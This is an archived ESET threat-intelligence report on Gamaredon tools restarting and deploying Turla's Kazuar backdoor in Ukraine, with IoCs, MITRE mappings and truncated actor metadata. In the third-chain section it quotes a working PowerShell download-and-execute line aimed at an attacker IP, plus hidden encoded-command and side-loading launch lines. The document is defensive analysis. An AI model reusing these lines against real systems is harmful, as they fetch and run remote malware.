{ "id": "ae3dfe8d-20e8-4815-ac09-7ff64f22573b", "created_at": "2026-04-06T00:16:12.097592Z", "updated_at": "2026-04-10T03:37:36.940446Z", "deleted_at": null, "sha1_hash": "bdcc83093677dc0ad36b2937396bc3d8b51dca57", "title": "Gamaredon X Turla collab", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2010395, "plain_text": "Gamaredon X Turla collab\r\nBy Matthieu FaouZoltán Rusnák\r\nArchived: 2026-04-05 23:21:28 UTC\r\nIn this blogpost, we uncover the first known cases of collaboration between Gamaredon and Turla, in Ukraine.\r\nKey points of this blogpost:\r\nIn February 2025, we discovered that the Gamaredon tool PteroGraphin was used to restart\r\nTurla’s Kazuar backdoor on a machine in Ukraine.\r\nIn April and June 2025, we detected that Kazuar v2 was deployed using Gamaredon tools\r\nPteroOdd and PteroPaste.\r\nThese discoveries lead us to believe with high confidence that Gamaredon is collaborating with\r\nTurla.\r\nTurla’s victim count is very low compared to the number of Gamaredon compromises,\r\nsuggesting that Turla choose the most valuable machines.\r\nBoth groups are affiliated with the FSB, Russia’s main domestic intelligence and security\r\nagency.\r\nThreat actor profiles\r\nGamaredon\r\nGamaredon has been active since at least 2013. It is responsible for many attacks, mostly against Ukrainian\r\ngovernmental institutions, as evidenced over time in several reports from CERT-UA and from other official\r\nUkrainian bodies. Gamaredon has been attributed by the Security Service of Ukraine (SSU) to the Center 18 of\r\nInformation Security of the FSB, operating out of occupied Crimea. We believe this group to be collaborating with\r\nanother threat actor that we discovered and named InvisiMole.\r\nTurla\r\nTurla, also known as Snake, is an infamous cyberespionage group that has been active since at least 2004, possibly\r\nextending back into the late 1990s. It is thought to be part of the FSB. It mainly focuses on high-profile targets,\r\nsuch as governments and diplomatic entities, in Europe, Central Asia, and the Middle East. It is known for having\r\nbreached major organizations such as the US Department of Defense in 2008 and the Swiss defense company\r\nRUAG in 2014. During the past few years, we have documented a large part of Turla’s arsenal on the\r\nWeLiveSecurity blog and in private reports.\r\nOverview\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 1 of 14\n\nIn February 2025, via ESET telemetry, we detected four different Gamaredon-Turla co-compromises in Ukraine.\r\nOn those machines, Gamaredon deployed a wide range of tools, including PteroLNK, PteroStew, PteroOdd,\r\nPteroEffigy, and PteroGraphin, while Turla only deployed Kazuar v3.\r\nOn one of those machines, we were able to capture a payload showing that Turla is able to issue commands via\r\nGamaredon implants. PteroGraphin was used to restart Kazuar, possibly after Kazuar crashed or was not launched\r\nautomatically. Thus, PteroGraphin was probably used as a recovery method by Turla. This is the first time that we\r\nhave been able to link these two groups together via technical indicators (see First chain: Restart of Kazuar v3).\r\nBecause, in all four cases, the ESET endpoint product was installed after the compromises we are unable to\r\npinpoint the exact compromise method. However, Gamaredon is known for using spearphishing and malicious\r\nLNK files on removable drives (as explained in our recent blogpost) so we presume that one of these is the most\r\nlikely compromise vector.\r\nIn April and June 2025, we detected Kazuar v2 installers being deployed directly by Gamaredon tools (see Second\r\nchain: Deployment of Kazuar v2 via PteroOdd and Third chain: Deployment of Kazuar v2 via PteroPaste). This\r\nshows that Turla is actively collaborating with Gamaredon to gain access to specific machines in Ukraine.\r\nVictimology\r\nOver the past 18 months we have detected Turla on seven machines in Ukraine. We believe that Gamaredon\r\ncompromised the first four machines in January 2025, while Turla deployed Kazuar v3 in February 2025. In all\r\ncases, the ESET endpoint product was only installed after both compromises.\r\nIt is worth noting that, prior to this, the last time we detected a Turla compromise in Ukraine was in February\r\n2024.\r\nAll those elements, and the fact that Gamaredon is compromising hundreds if not thousands of machines, suggest\r\nthat Turla is interested only in specific machines, probably ones containing highly sensitive intelligence.\r\nAttribution\r\nGamaredon\r\nIn those compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we believe are exclusive to\r\nGamaredon.\r\nTurla\r\nSimilarly, for Turla, we detected the use of Kazuar v2 and Kazuar v3, which we believe are exclusive to that\r\ngroup.\r\nGamaredon-Turla collaboration hypotheses\r\nIn 2020, we showed that Gamaredon provided access to InvisiMole (see our white paper), so it is not the first time\r\nthat Gamaredon has collaborated with another Russia-aligned threat actor.\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 2 of 14\n\nOn the other hand, Turla is known for hijacking other threat actors’ infrastructure to get an initial foothold in its\r\ntargets’ networks. Over the past years, several cases have been publicly documented:\r\nIn 2019, Symantec published a blogpost showing that Turla hijacked OilRig (an Iran-aligned group)\r\ninfrastructure to spy on a Middle Eastern target.\r\nIn 2023, Mandiant published a blogpost showing that Turla reregistered expired Andromeda C\u0026C domains\r\nin order to compromise targets in Ukraine.\r\nIn 2024, Microsoft published two blogposts (first and second) showing that Turla hijacked the cybercrime\r\nbotnet Amadey and infrastructure of the cyberespionage group SideCopy (a Pakistan-aligned group) in\r\norder to deploy Kazuar.\r\nNote that both Gamaredon and Turla are part of the Russian Federal Security Service (FSB). Gamaredon is\r\nthought to be operated by officers of Center 18 of the FSB (aka the Center for Information Security) in Crimea\r\n(see this report from the Security Service of Ukraine), which is part of the FSB’s counterintelligence service. As\r\nfor Turla, the UK’s NCSC attributes the group to the Center 16 of the FSB, which is Russia’s main signals\r\nintelligence (SIGINT) agency.\r\nTherefore, we propose three hypotheses to explain our observations:\r\nVery likely: Given that both groups are part of the Russian FSB (though in two different Centers),\r\nGamaredon provided access to Turla operators so that they could issue commands on a specific machine to\r\nrestart Kazuar, and deploy Kazuar v2 on some others.\r\nUnlikely: Turla compromised Gamaredon infrastructure and leveraged this access to recover access on a\r\nmachine in Ukraine. Since PteroGraphin contains a hardcoded token that allows modifying the C\u0026C pages,\r\nthis possibility cannot be fully discarded. However, it implies that Turla was able to reproduce the full\r\nGamaredon chain.\r\nUnlikely: Gamaredon has access to Kazuar and deploys it on very specific machines. Given Gamaredon’s\r\nnoisy approach, we don’t think it would be that careful deploying Kazuar on only a very limited set of\r\nvictims.\r\nGeopolitical context\r\nFrom an organizational perspective, it is worth noting that the two entities commonly associated with Turla and\r\nGamaredon have a long history of reported collaboration, which can be traced back to the Cold War era.\r\nThe FSB’s Center 16 (which is believed to harbor Turla) is a direct heir to the KGB’s 16th Directorate, which was\r\nmainly responsible for foreign SIGINT collection – the persistence of the number 16 is in fact regarded by\r\nobservers as a sign of the FSB leadership’s desire to emphasize a historical lineage. Center 18 (which is generally\r\nassociated with Gamaredon) maintains a rough affiliation with the KGB’s 2nd Chief Directorate, which was\r\nresponsible for internal security within the Soviet Union. During the Soviet era, both organizations frequently\r\nworked hand in hand, sharing responsibilities for monitoring foreign embassies on Russian soil for instance.\r\nThen and now, such collaborations reflect the Russian strategic culture and philosophy of a natural continuity\r\nbetween internal security and national defense. Although Center 16 is still tasked with foreign intelligence\r\ncollection and Center 18 is theoretically part of the FSB’s counterintelligence apparatus, both entities seem to\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 3 of 14\n\nmaintain some mission overlaps – especially with regard to former Soviet republics. In 2018, the Security Service\r\nof Ukraine (SBU) had already observed Centers 16 and 18 apparently conducting a joint cyberespionage\r\ncampaign (named SpiceyHoney). The 2022 full-scale invasion of Ukraine has probably reinforced this\r\nconvergence, with ESET data clearly showing Gamaredon and Turla activities focusing on the Ukrainian defense\r\nsector in recent months.\r\nAlthough the Russian intelligence community is known for its fierce internal rivalries, there are indications that\r\nsuch tensions chiefly apply to interservice relations rather than to intra-agency interactions. In this context, it is\r\nperhaps not entirely surprising that APT groups operating within these two FSB Centers are observed cooperating\r\nto some extent.\r\nFirst chain: Restart of Kazuar v3\r\nIn February 2025, we detected the execution of Kazuar by PteroGraphin and PteroOdd on a machine in Ukraine.\r\nIn this section we detail the exact chain that we detected.\r\nTimeline\r\nThe overall timeline for this machine is the following:\r\n2025-01-20: Gamaredon deployed PteroGraphin on the machine. Note that the date is from the file creation\r\ntimestamp provided by Windows, which could have been tampered with.\r\n2025-02-11: Turla deployed Kazuar v3 on the machine. Note that the date is from the file creation\r\ntimestamp provided by Windows, which could have been tampered with.\r\n2025-02-27 15:47:39 UTC: PteroGraphin downloaded PteroOdd.\r\n2025-02-27 15:47:56 UTC: PteroOdd downloaded a payload, which executed Kazuar.\r\n2025-02-28 15:17:14 UTC: PteroOdd downloaded another payload, which also executed Kazuar.\r\nHereafter, we assume these dates to be unaltered.\r\nDetails of the events\r\nSince January 20th, 2025, PteroGraphin (see Figure 1) was present on the machine at %APPDATA%\\x86.ps1. It is\r\na downloader that provides an encrypted channel for delivering payloads via Telegra.ph, a web service operated\r\nby Telegram that enables easy creation of web pages. Note that PteroGraphin contains a token to edit the\r\nTelegra.ph page, so anyone with knowledge of this token (Turla, for example, though unlikely) could manipulate\r\nthe contents.\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 4 of 14\n\nFigure 1. PteroGraphin (token partially redacted)\r\nOn February 27th, 2025, at 15:47:39 UTC, as shown in Figure 2, we detected a reply from\r\nhttps://api.telegra[.]ph/getPage/SecurityHealthSystray-01-20?return_content=true.\r\nFigure 2. Beautified JSON reply\r\nThe data in children can be decrypted using the hardcoded 3DES key and IV from the PteroGraphin script above,\r\nwhich gives:\r\npowershell -windowStyle hidden -EncodedCommand \u003cbase64-encoded_payload\u003e\r\nThe decoded payload is another PowerShell downloader that we named PteroOdd, shown in Figure 3.\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 5 of 14\n\nFigure 3. PteroOdd\r\nOn February 27th, 2025 at 15:47:56 UTC, we detected a request to https://api.telegra[.]ph/getPage/dinoasjdnl-02-\r\n27?return_content=true; the reply is shown in Figure 4. Note that the replies for PteroOdd are not encrypted.\r\nFigure 4. PteroOdd JSON reply (beautified and partially redacted)\r\nThe decoded command is shown in Figure 5.\r\nFigure 5. Decoded PowerShell command (username redacted)\r\nThe payload first uploads the victim’s computer name and system drive’s volume serial number to the Cloudflare\r\nworker subdomain https://lucky-king-96d6.mopig92456.workers[.]dev.\r\nWhat is most interesting is the last line:\r\nStart-Process -FilePath \"C:\\Users\\[redacted]\\AppData\\Local\\Programs\\Sony\\Audio\\Drivers\\vncutil64.exe\"\r\nThis is the path to the application that is run to execute Kazuar by side-loading it. The ESET endpoint product\r\ndetected a KERNEL Kazuar v3 payload (agent_label is AGN-RR-01) in memory and loaded from this process. It\r\nis not clear to us why Turla operators had to use PteroGraphin to launch Kazuar, but it is possible that Kazuar\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 6 of 14\n\nsomehow stopped working after the ESET product installation and that they had to restart the implant. Note that\r\nwe didn’t see Gamaredon downloading Kazuar; it was present on the system since February 11\r\nth\r\n, 2025, before the\r\nESET product was installed.\r\nThen, on February 28th, 2025 at 15:17:14 UTC, we detected another similar PowerShell script, shown in Figure 6.\r\nFigure 6. Second PowerShell command executing Kazuar\r\nThe first lines and the Cloudflare worker subdomain are identical. It starts the same vncutil64.exe but also a\r\nsecond executable, LaunchGFExperience.exe, which side-loads LaunchGFExperienceLOC.dll – the Kazuar\r\nloader. We then detected in memory, in the LaunchGFExperience.exe process, another KERNEL Kazuar v3\r\npayload (agent_label is AGN-XX-01). It is not clear why two different KERNEL Kazuar v3 payloads were present\r\non the same machine.\r\nFinally, an HTTP POST request, with the list of running processes, was sent to https://eset.ydns[.]eu/post.php. The\r\nTurla operators most likely wanted confirmation that Kazuar was successfully launched.\r\nOn March 10th, 2025 at 07:05:32 UTC, we detected another sample of PteroOdd, which uses the C\u0026C URL\r\nhttps://api.telegra[.]ph/getPage/canposgam-03-06?return_content=true. This sample was detected on a different\r\nmachine in Ukraine, on which Kazuar was also present.\r\nThe decoded payload is shown in Figure 7 and shows that it also uses eset.ydns[.]eu, while not interacting with\r\nany Turla sample.\r\nOn the other hand, we noted that the downloaded payload uploads the following pieces of information to\r\nhttps://eset.ydns[.]eu/post.php:\r\nthe victim’s computer name and username,\r\nlast boot time,\r\nthe list of running processes,\r\nOS version,\r\nOS bitness,\r\nthe list of installed .NET versions (extracted from HKLM\\SOFTWARE\\Microsoft\\NET Framework\r\nSetup\\NDP),\r\nthe list of files and directories in %TEMP% and all its subdirectories, and\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 7 of 14\n\nthe list of files and directories in the following paths:\r\n○ %APPDATA%\\Microsoft\\Windows\r\n○ C:\\Program Files\r\n○ C:\\Program Files (x86)\r\nHowever, we are not aware of any .NET tool that is currently being used by Gamaredon, while there are several of\r\nthem used by Turla, including Kazuar. Thus, it is possible that these uploaded pieces of information are for Turla,\r\nand we assess with medium confidence that the domain eset.ydns[.]eu is controlled by Turla.\r\nFigure 7. PteroOdd sample\r\nThe additional base64-encoded PowerShell command is a new downloader that abuses api.gofile[.]io; we named it\r\nPteroEffigy.\r\nKazuar v3\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 8 of 14\n\nKazuar v3 is the latest branch of the Kazuar family, itself an advanced C# espionage implant that we believe is\r\nused exclusively by Turla since it was first seen in 2016. Kazuar v2 and v3 are fundamentally the same malware\r\nfamily and share the same codebase. However, some major changes have been introduced.\r\nKazuar v3 comprises around 35% more C# lines than Kazuar v2 and introduces additional network transport\r\nmethods: over web sockets and Exchange Web Services. Kazuar v3 can have one of three roles (KERNEL,\r\nBRIDGE, or WORKER), and malware functionalities are divided among those roles. For example, only BRIDGE\r\ncommunicates with the C\u0026C server.\r\nSecond chain: Deployment of Kazuar v2 via PteroOdd\r\nOn one of the Ukrainian machines mentioned in the previous section, we detected another interesting compromise\r\nchain on April 18th, 2025.\r\nOn April 18th, 2025 at 15:26:14 UTC, we detected a PteroOdd sample (a Gamaredon tool) downloading a payload\r\nfrom https://api.telegra[.]ph/getPage/scrsskjqwlbw-02-28?return_content=true. The downloaded script, shown in\r\nFigure 8, is similar to the payload described in the first chain, but contains an additional base64-encoded script,\r\nwhich is the PowerShell downloader PteroEffigy.\r\nFigure 8. Payload downloaded by PteroOdd\r\nThis PowerShell payload downloads another payload from https://eset.ydns[.]eu/scrss.ps1 and executes it.\r\nscrss.ps1 turned out to be an installer for Turla’s Kazuar v2, which was previously analyzed in detail by Unit42.\r\nThis shows that Gamaredon deployed Kazuar, most likely on behalf of Turla.\r\nThe Kazuar agent_label is AGN-AB-26 and the three C\u0026C servers are:\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 9 of 14\n\nhttps://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php\r\nhttps://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php\r\nhttps://www.pizzeria-mercy[.]de/wp-includes/images/media/bar/index.php\r\nIt is worth noting that Turla keeps using compromised WordPress servers as C\u0026Cs for Kazuar.\r\nInterestingly, it seems that Kazuar v2 is still maintained in parallel to Kazuar v3. For example, the recent updates\r\nto the backdoor commands in Kazuar v3 are also included in this AGN-AB-26 version.\r\nThird chain: Deployment of Kazuar v2 via PteroPaste\r\nOn June 5th and 6th, 2025, we detected Gamaredon deploying a Turla implant on two machines in Ukraine. In\r\nboth cases, Gamaredon’s PteroPaste was caught trying to execute the simple PowerShell script shown in Figure 9.\r\nFigure 9. PowerShell script executed by PteroPaste\r\nThe base64-encoded string is the following downloader in PowerShell:\r\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object\r\nNet.WebClient).downloadString('https://91.231.182[.]187/ekrn.ps1');\r\nThe downloaded script ekrn.ps1 is very similar to scrss.ps1 mentioned in the second chain. This also drops and\r\ninstalls Kazuar v2.\r\nBoth samples have an agent_label of AGN-AB-27 and the C\u0026C servers are the same as those in the sample from\r\nthe second chain:\r\nhttps://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php\r\nhttps://www.pizzeria-mercy[.]de/wp-includes/images/media/bar/index.php\r\nhttps://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php\r\nekrn.exe is a legitimate process of ESET endpoint security products. Thus, Turla probably tried to masquerade as\r\nit in order to fly under the radar. Also note that ekrn.ydns[.]eu resolves to 91.231.182[.]187.\r\nFinally, we also found on VirusTotal a VBScript variant of the Kazuar v2 PowerShell installer. It was uploaded\r\nfrom Kyrgyzstan on June 5th, 2025. This suggests that Turla is interested in targets outside of Ukraine as well.\r\nConclusion\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 10 of 14\n\nIn this blogpost, we have shown how Turla was able to leverage implants operated by Gamaredon (PteroGraphin,\r\nPteroOdd, and PteroPaste) in order to restart Kazuar v3 and deploy Kazuar v2 on several machines in Ukraine. We\r\nnow believe with high confidence that both groups – separately associated with the FSB – are cooperating and that\r\nGamaredon is providing initial access to Turla.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at\r\nthreatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this\r\nservice, visit the ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 Filename Detection Description\r\n7DB790F75829D3E6207D\r\n8EC1CBCD3C133F596D67\r\nN/A PowerShell/Pterodo.QB PteroOdd.\r\n2610A899FE73B8F018D1\r\n9B50BE55D66A6C78B2AF\r\nN/A PowerShell/Pterodo.QB PteroOdd.\r\n3A24520566BBE2E262A2\r\n911E38FD8130469BA830\r\nN/A PowerShell/Pterodo.QB PteroOdd.\r\nDA7D5B9AB578EF648747\r\n3180B975A4B2701FDA9E\r\nscrss.ps1 PowerShell/Turla.AI Kazuar v2 installer.\r\nD7DF1325F66E029F4B77\r\nE211A238AA060D7217ED\r\nN/A MSIL/Turla.N.gen Kazuar v2.\r\nFF741330CC8D9624D791\r\nDE9074086BBFB0E257DC\r\nN/A\r\nPowerShell/TrojanDo\r\nwnloader.Agent.DV\r\nPowerShell\r\ndownloader\r\nexecuted by\r\nPteroPaste.\r\nA7ACEE41D66B537D9004\r\n03F0E6A26AB6A1290A32\r\nekrn.ps1 PowerShell/Turla.AJ Kazuar v2 installer.\r\n54F2245E0D3ADEC566E4\r\nD822274623BF835E170C\r\nN/A MSIL/Agent_AGen.CZQ Kazuar v2.\r\n371AB9EB2A3DA44099B2\r\nB7716DE0916600450CFD\r\nekrn.ps1 PowerShell/Turla.AJ Kazuar v2 installer.\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 11 of 14\n\nSHA-1 Filename Detection Description\r\n4A58365EB8F928EC3CD6\r\n2FF59E59645C2D8C0BA5\r\nN/A MSIL/Turla.W Kazuar v2.\r\n214DC22FA25314F9C0DD\r\nA54F669EDE72000C85A4\r\nSandboxie.vbs VBS/Turla.C\r\nKazuar v2 installer\r\n– VBScript variant.\r\nNetwork\r\nIP Domain\r\nHosting\r\nprovider\r\nFirst seen Details\r\nN/A\r\nlucky-king-96d6.mop\r\nig92456.workers[.]dev\r\nN/A 2025‑02‑28\r\nCloudflare worker\r\nfound in payloads\r\ndownloaded by\r\nPteroOdd.\r\n64.176.173[.]164 eset.ydns[.]eu\r\nThe Constant\r\nCompany, LLC\r\n2025‑03‑01\r\nC\u0026C server found in\r\npayloads downloaded\r\nby PteroOdd.\r\n85.13.145[.]231\r\nhauptschule-schw\r\nalbenstrasse[.]de\r\nNeue Medien\r\nMuennich\r\nGmbH\r\n2024‑06‑06\r\nCompromised\r\nWordPress site used as\r\nKazuar C\u0026C.\r\n91.231.182[.]187 ekrn.ydns[.]eu\r\nSouth Park\r\nNetworks LLC\r\n2025‑06‑05\r\nC\u0026C server in\r\npayloads downloaded\r\nby PteroPaste.\r\n185.118.115[.]15 fjsconsultoria[.]com\r\nDream Fusion -\r\nIT Services,\r\nLda\r\n2024‑06‑26\r\nCompromised\r\nWordPress site used as\r\nKazuar C\u0026C.\r\n77.46.148[.]242 ingas[.]rs\r\nTELEKOM\r\nSRBIJA a.d.\r\n2024‑06‑03\r\nCompromised\r\nWordPress site used as\r\nKazuar C\u0026C.\r\n168.119.152[.]19 abrargeospatial[.]ir\r\nHetzner Online\r\nGmbH\r\n2023‑11‑13\r\nCompromised\r\nWordPress site used as\r\nKazuar C\u0026C.\r\n217.160.0[.]33\r\nwww.brannenburger-nagelfluh[.]de\r\nIONOS SE 2019‑06‑06\r\nCompromised\r\nWordPress site used as\r\nKazuar C\u0026C.\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 12 of 14\n\nIP Domain\r\nHosting\r\nprovider\r\nFirst seen Details\r\n217.160.0[.]159 www.pizzeria-mercy[.]de IONOS SE 2023‑10‑05\r\nCompromised\r\nWordPress site used as\r\nKazuar C\u0026C.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 17 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1583.001\r\nAcquire\r\nInfrastructure:\r\nDomains\r\nGamaredon or Turla registered a domain at a free\r\ndynamic DNS provider.\r\nT1583.004\r\nAcquire\r\nInfrastructure: Server\r\nGamaredon or Turla rented a server at Vultr.\r\nT1583.007\r\nAcquire\r\nInfrastructure:\r\nServerless\r\nGamaredon created Cloudflare workers and\r\nTelegra.ph pages.\r\nT1584.003\r\nCompromise\r\nInfrastructure: Virtual\r\nPrivate Server\r\nTurla compromised WordPress websites.\r\nT1608 Stage Capabilities\r\nTurla staged Kazuar installer scripts on its C\u0026C\r\nservers.\r\nExecution T1059.001\r\nCommand and\r\nScripting Interpreter:\r\nPowerShell\r\nPteroGraphin is developed in PowerShell.\r\nPersistence T1574.002\r\nHijack Execution\r\nFlow: DLL Side-LoadingKazuar loaders use DLL side-loading.\r\nDefense\r\nEvasion\r\nT1140\r\nDeobfuscate/Decode\r\nFiles or Information\r\nThe Kazuar payload is XOR encrypted and all\r\nKazuar strings are encrypted via substitution tables.\r\nT1480.001\r\nExecution Guardrails:\r\nEnvironmental\r\nKeying\r\nKazuar loaders decrypt the payloads, using the\r\nmachine name as the key.\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 13 of 14\n\nTactic ID Name Description\r\nT1036.005\r\nMasquerading: Match\r\nLegitimate Name or\r\nLocation\r\nKazuar loaders are located in legitimate-looking\r\ndirectories such as C:\\Program Files (x86)\\Brother\r\nPrinter\\App\\ or\r\n%LOCALAPPDATA%\\Programs\\Sony\\Audio\\\r\nDrivers\\.\r\nDiscovery\r\nT1057 Process Discovery\r\nThe PowerShell script starting Kazuar v3 sends the\r\nlist of running processes to its C\u0026C server.\r\nT1012 Query Registry\r\nThe PowerShell script starting Kazuar v3 gets the\r\nPowerShell version from the registry.\r\nT1082\r\nSystem Information\r\nDiscovery\r\nThe PowerShell script starting Kazuar v3 exfiltrates\r\nthe last boot time, OS version, and OS architecture.\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nThe PowerShell script starting Kazuar v3 lists files\r\nin the directories %TEMP% and\r\n%APPDATA%\\Microsoft\\Windows.\r\nCommand\r\nand Control\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web\r\nProtocols\r\nPteroGraphin and Kazuar use HTTPS.\r\nT1573.001\r\nEncrypted Channel:\r\nSymmetric\r\nCryptography\r\nPteroGraphin decrypts the C\u0026C reply using 3DES.\r\nT1102 Web Service\r\nLegitimate web services, such as Telegra.ph, were\r\nused in this campaign.\r\nSource: https://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/" ], "report_names": [ "gamaredon-x-turla-collab" ], "threat_actors": [ { "id": "11f52079-26d3-4e06-8665-6a0b3efdc41c", "created_at": "2022-10-25T16:07:23.736987Z", "updated_at": "2026-04-10T02:00:04.732021Z", "deleted_at": null, "main_name": "InvisiMole", "aliases": [ "UAC-0035" ], "source_name": "ETDA:InvisiMole", "tools": [ "InvisiMole" ], "source_id": "ETDA", "reports": null }, { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc", "created_at": "2022-10-27T08:27:12.955905Z", "updated_at": "2026-04-10T02:00:05.376527Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "SideCopy" ], "source_name": "MITRE:SideCopy", "tools": [ "AuTo Stealer", "Action RAT" ], "source_id": "MITRE", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "12b5d602-4017-4a6f-a2a3-387a6e07a27b", "created_at": "2023-01-06T13:46:39.095233Z", "updated_at": "2026-04-10T02:00:03.21157Z", "deleted_at": null, "main_name": "InvisiMole", "aliases": [], "source_name": "MISPGALAXY:InvisiMole", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00", "created_at": "2023-01-06T13:46:39.30167Z", "updated_at": "2026-04-10T02:00:03.280161Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [], "source_name": "MISPGALAXY:SideCopy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", 